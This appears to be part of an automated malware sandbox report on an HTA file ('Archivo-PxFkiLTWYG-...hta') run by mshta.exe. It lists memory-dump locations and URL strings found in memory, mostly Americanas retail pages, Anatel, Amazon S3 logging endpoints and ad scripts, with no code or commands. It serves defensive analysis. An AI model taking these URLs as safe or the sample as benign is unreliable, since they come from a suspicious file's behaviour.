Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2659343990.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2749376863.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745043189.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744380912.000000000336C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.000000000336A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2766109182.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750683255.0000000003370000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/09/sec-brinquedos_esporte-e-lazer-destaque-mob-
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2713650880.00000000065AC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2695470306.00000000065AA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2544825799.0000000006524000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2659343990.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2705796688.00000000065AB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654867106.00000000065A3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2546345644.000000000651E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771021484.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2543401774.0000000006527000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744380912.000000000336C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2542970365.0000000006524000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.000000000336A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2717171158.00000000065AF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726884364.000000000929B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-imag
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743361404.00000000092D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747376741.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668493966.000000000C070000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2746776298.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764171931.000000000C07E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748881120.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667279344.00000000092D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751601665.00000000092DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2777141296.000000000C306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://informacoes.anatel.gov.br/paineis/certificacao-de-produtos/consulta-de-produtos
Source: mshta.exe, 00000000.00000003.2714640345.0000000009A55000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2705493492.0000000009A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://informacoes.anatel.gov.br/paineis/certificacao-de-produtos/consulta-de-produtoshttps://image
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668781853.000000000C0F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764401664.000000000C0FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://itunes.apple.com/app/apple
Source: mshta.exe, 00000000.00000003.2668217939.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2749644563.000000000AA58000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2775210853.000000000AA5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2775247282.000000000AA60000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743317216.000000000C09F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726955229.000000000C09B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727148454.000000000C09C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655457107.000000000AA4F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669117708.000000000C09A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666770510.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2775912895.000000000C0A2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750256226.000000000AA5D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751165460.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743221482.000000000AA57000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://logs-referer.s3-sa-east-1.amazonaws.com/image.jpeg?x-cm=lasa&x-ref=
Source: mshta.exe, 00000000.00000003.2668217939.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666770510.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751165460.000000000A919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://logs-referer.s3-sa-east-1.amazonaws.com/image.jpeg?x-cm=lasa&x-ref=Ef
Source: mshta.exe, 00000000.00000003.2668217939.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666770510.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751165460.000000000A919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://logs-referer.s3-sa-east-1.amazonaws.com/image.jpeg?x-cm=lasa&x-ref=mg
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743405229.000000000C28F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2777055490.000000000C295000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776004246.000000000C0AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745557399.000000000C293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2713571137.0000000009A8E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747772805.000000000C293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665620808.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C288000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655631658.000000000C288000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nossaslojas.americanas.com.br/?chave=dk_ft_lojas
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774829877.000000000A9E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.000000000929F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://nossaslojas.americanas.com.br/?chave=o2o_hm_00_0_0_nossaslojas
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667189470.000000000C11D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665727744.000000000C113000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665620808.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nossaslojas.americanas.com.br/?chave=prf_hm_0_tt_9_lojas
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776004246.000000000C0AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667632978.000000000C0CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668295079.000000000C107000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009332000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748344346.000000000C0D1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667502431.000000000C106000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.0000000009333000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://protecaodemarcas.americanas.io/
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.0000000003426000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2766365966.0000000003426000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://ri.americanas.com/governanca-corporativa/estatuto-codigos-e-politicas
Source: mshta.exe, 00000000.00000003.2677244929.00000000092EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771183068.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743843394.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668295079.000000000C107000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667502431.000000000C106000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667308692.000000000C103000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ri.americanas.io
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ri.americanas.io%
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ri.americanas.io/-
Source: mshta.exe, 00000000.00000003.2677244929.00000000092EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743843394.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751994792.00000000092F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ri.americanas.iortm
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657107749.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2777017710.000000000C288000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654357820.000000000C367000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2766148440.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675688068.000000000C36E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666770510.000000000A916000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C351000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666932319.000000000C368000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C288000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655631658.000000000C288000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2777437455.000000000C36F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ri.lasa.com.br
Source: mshta.exe, 00000000.00000003.2727024029.000000000C0EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676098598.000000000C0EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776004246.000000000C0AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776512288.000000000C0ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744538123.000000000C0A3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2700307516.00000000065B6000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743317216.000000000C09F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726955229.000000000C09B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727148454.000000000C09C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668493966.000000000C070000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764171931.000000000C07E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669117708.000000000C09A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666159543.000000000C0A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2722303804.00000000065B7000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2775946961.000000000C0A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669539249.000000000C07E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670092360.000000000C0AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s3-sa-east-1.amazonaws.com/frame-image-br/bg.png?x-id=102d82f99a6f9cf9056d901bddf67848&x-r=&
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771021484.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726884364.000000000929B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747805696.000000000AA00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751601665.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668523630.0000000009297000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://schema.org
Source: mshta.exe, 00000000.00000003.2651095257.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2772182378.0000000009401000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665118307.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726694217.0000000009401000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669377685.0000000009401000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securepubads.g.doubleclick.net/pagead/managed/js/gpt/m202412090101/pubads_impl.js...
